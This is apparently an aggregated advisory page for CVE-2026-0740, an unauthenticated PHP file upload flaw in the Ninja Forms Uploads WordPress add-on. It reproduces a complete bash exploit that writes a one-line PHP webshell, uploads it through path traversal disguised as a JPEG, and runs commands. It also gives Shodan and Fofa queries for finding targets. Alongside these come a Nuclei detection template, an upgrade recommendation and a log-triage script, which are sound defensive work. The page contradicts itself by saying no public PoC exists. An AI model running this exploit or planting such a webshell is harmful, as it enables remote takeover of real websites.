[webapps] Ninja Forms Uploads - Unauthenticated PHP File Upload
CVE-2026-0740
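Vulnerability
High · CVSS N/A

📋 Basic vulnerability information

| CVE | CVE-2026-0740 |
|---|---|
| Vulnerability type | Vulnerability |
| Affected versions | See the original post |
| Severity | High · CVSS N/A |
| Published | 2026-05-13 |
| Submitter | Sélim Lanouar (@whattheslime) |
| Source | Exploit-DB (original post) |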

⚔️ Original PoC

```bash
# Exploit Author: Sélim Lanouar (@whattheslime)
# Fofa Query: body="nfpluginsettings.js?ver="
# Shodan Query: http.html:"nfpluginsettings.js?ver="
# =============================================================================
if [ "$#" -ne 1 ]; then
    echo "Usage: $0 <target_url>"
    exit 1
fi
target=$1
field_id=$(head /dev/urandom | tr -dc '1-9' | head -c 16 ; echo)
file_name=webshell.php
echo "[-] Writing webshell in /tmp/$file_name..."
echo '<?php system($_GET["cmd"]); ?>' > /tmp/$file_name
echo "[-] Fetching nonce for random field_id $field_id..."
nonce=$(curl -s -X POST "$target/wp-admin/admin-ajax.php" \
    -d "action=nf_fu_get_new_nonce&field_id=$field_id" | jq -r '.data.nonce')
echo "[+] Got nf_fu_upload nonce: $nonce"
echo "[-] Uploading webshell..."
response=$(curl -ks -X POST "$target/wp-admin/admin-ajax.php" \
    -F "action=nf_fu_upload" \
    -F "nonce=$nonce" \
    -F "form_id=$field_id" \
    -F "field_id=$field_id" \
    -F "image_jpg=../../../$file_name" \
    -F "files-$field_id=@/tmp/$file_name;filename=image.jpg;type=image/jpeg")
echo "[+] Upload response: $response"
command="curl -ks '$target/wp-content/$file_name?cmd=id'"
echo "[-] Executing the 'id' command via the uploaded webshell: $command"
result=$(eval $command)
echo "[+] Command output: $result"
```

🔍 Nuclei Detection Template
The following detection template is used to determine whether a target is affected:

```yaml
id: CVE-2026-0740-detection

info:
  name: Ninja Forms Uploads - Version Detection
  author: exploitdb
  severity: medium
  description: |
    Ninja Forms Uploads plugin version 3.3.24 is vulnerable to unauthenticated PHP file upload.
    This detection template checks for the presence of the file-uploads add-on and its version.
  reference:
    - https://ninjaforms.com/extensions/file-uploads/
  tags: wordpress,plugin,ninja-forms,file-uploads,cve,cve2026

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/ninja-forms-uploads/readme.txt"
      - "{{BaseURL}}/wp-content/plugins/ninja-forms-uploads/ninja-forms-uploads.php"
    stop-at-first-match: true
    # With "or", either matcher alone produces a result.
    matchers-condition: or
    matchers:
      # Version match: readme.txt advertises one of the listed releases.
      - type: word
        part: body
        words:
          - "Stable tag: 3.3.24"
          - "Stable tag: 3.3.23"
          - "Stable tag: 3.3.22"
          - "Stable tag: 3.3.21"
          - "Stable tag: 3.3.20"
        condition: or
      # Presence match: fires on any install of the add-on, whatever its
      # version, so read the extracted version before treating a hit as affected.
      - type: word
        part: body
        words:
          - "Ninja Forms Uploads"
          - "nf-fu-uploads"
        condition: or
    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - 'Stable tag: ([0-9]+\.[0-9]+\.[0-9]+)'
          - 'Version: ([0-9]+\.[0-9]+\.[0-9]+)'
```

🛡️ Remediation
Upgrade to the vendor's latest secure release.
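
A log-triage check to run alongside the upgrade, added here as an example and not part of the original PoC or the plugin's code: it flags successful requests for PHP files sitting directly in `/wp-content/` (where the PoC's `../../../` traversal places the file) and records whether the same client sent `admin-ajax.php` POSTs beforehand. The combined log format, the sample lines and the `EXPECTED` allow-list are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [13/May/2026:10:00:01 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 88 "-" "curl/8.5.0"
203.0.113.7 - - [13/May/2026:10:00:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 120 "-" "curl/8.5.0"
203.0.113.7 - - [13/May/2026:10:00:03 +0000] "GET /wp-content/webshell.php?cmd=id HTTP/1.1" 200 54 "-" "curl/8.5.0"
198.51.100.20 - - [13/May/2026:10:01:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 40 "-" "Mozilla/5.0"
198.51.100.20 - - [13/May/2026:10:01:05 +0000] "GET /wp-content/plugins/ninja-forms/assets/js/min/front-end.js HTTP/1.1" 200 900 "-" "Mozilla/5.0"
192.0.2.9 - - [13/May/2026:10:02:00 +0000] "GET /wp-content/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.0.2.9 - - [13/May/2026:10:03:00 +0000] "GET /wp-content/x.php HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

# client IP, timestamp, method, request URI, status code
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# A PHP file directly in /wp-content/ (no subdirectory), with or without a query.
ROOT_PHP = re.compile(r'^/wp-content/([^/?]+\.php)(?:\?|$)', re.I)
# Assumption: files the operator expects at that level; add local drop-ins here.
EXPECTED = {"index.php"}


def triage(log_text, expected=EXPECTED):
    """Return one finding per 200 response for an unexpected root-level PHP file."""
    ajax_posts = defaultdict(int)  # client IP -> admin-ajax.php POSTs seen so far
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, ts, method, uri, status = m.groups()
        if method == "POST" and uri.split("?", 1)[0] == "/wp-admin/admin-ajax.php":
            ajax_posts[ip] += 1
            continue
        hit = ROOT_PHP.match(uri)
        if hit and status == "200" and hit.group(1).lower() not in expected:
            findings.append({
                "ip": ip, "time": ts, "uri": uri,
                # Two earlier POSTs from this client fit the nonce request
                # followed by the upload request seen in the PoC.
                "preceded_by_ajax_posts": ajax_posts[ip] >= 2,
            })
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

POST bodies are not written to access logs, so the `action` values are not visible here; the correlation relies on request order per client, and a finding is a lead for checking the file on disk rather than proof of compromise.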
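
🚨 Threat assessment

| 📈 EPSS exploitation probability | No data available |
|---|---|
| 🚨 CISA KEV | Not known to be exploited |
| 🔧 Public PoC | No public PoC available |

⚠️ This article is based on public vulnerability databases and is intended for security research and defensive reference only. Generated: 2026-05-18 21:54 | Source: Exploit-DB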